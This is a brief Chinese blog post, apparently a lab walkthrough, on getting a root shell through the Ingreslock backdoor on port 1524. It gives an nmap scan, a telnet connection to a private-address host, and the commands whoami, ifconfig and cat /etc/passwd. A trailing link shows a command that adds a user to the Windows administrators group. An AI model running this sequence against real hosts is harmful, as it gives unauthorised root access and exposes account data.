目的:利用telnet连接目标主机的1524端口,直接获取root权限;
原理:Ingreslock后门程序运行在1524端口,连接到1524端口就能直接获得root权限,经常用于入侵一个暴露的服务器;
步骤:nmap -sV 192.168.1.3 , 扫描目标主机端口,发现目标主机开启了1524端口;
telnet 192.168.1.3 1524 连接目标主机并直接成功,
在渗透进的主机中,输入 whoami ,查看获取的权限,再输入,ifconfig eth0,查看网卡信息,再输入 cat /etc/passwd,查看主机的密码文件。
Nmap --- Ingreslock后门漏洞
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
推荐阅读更多精彩内容
- win7 cmd管理员权限设置 net localgroup administrators 用户名 /add 把“...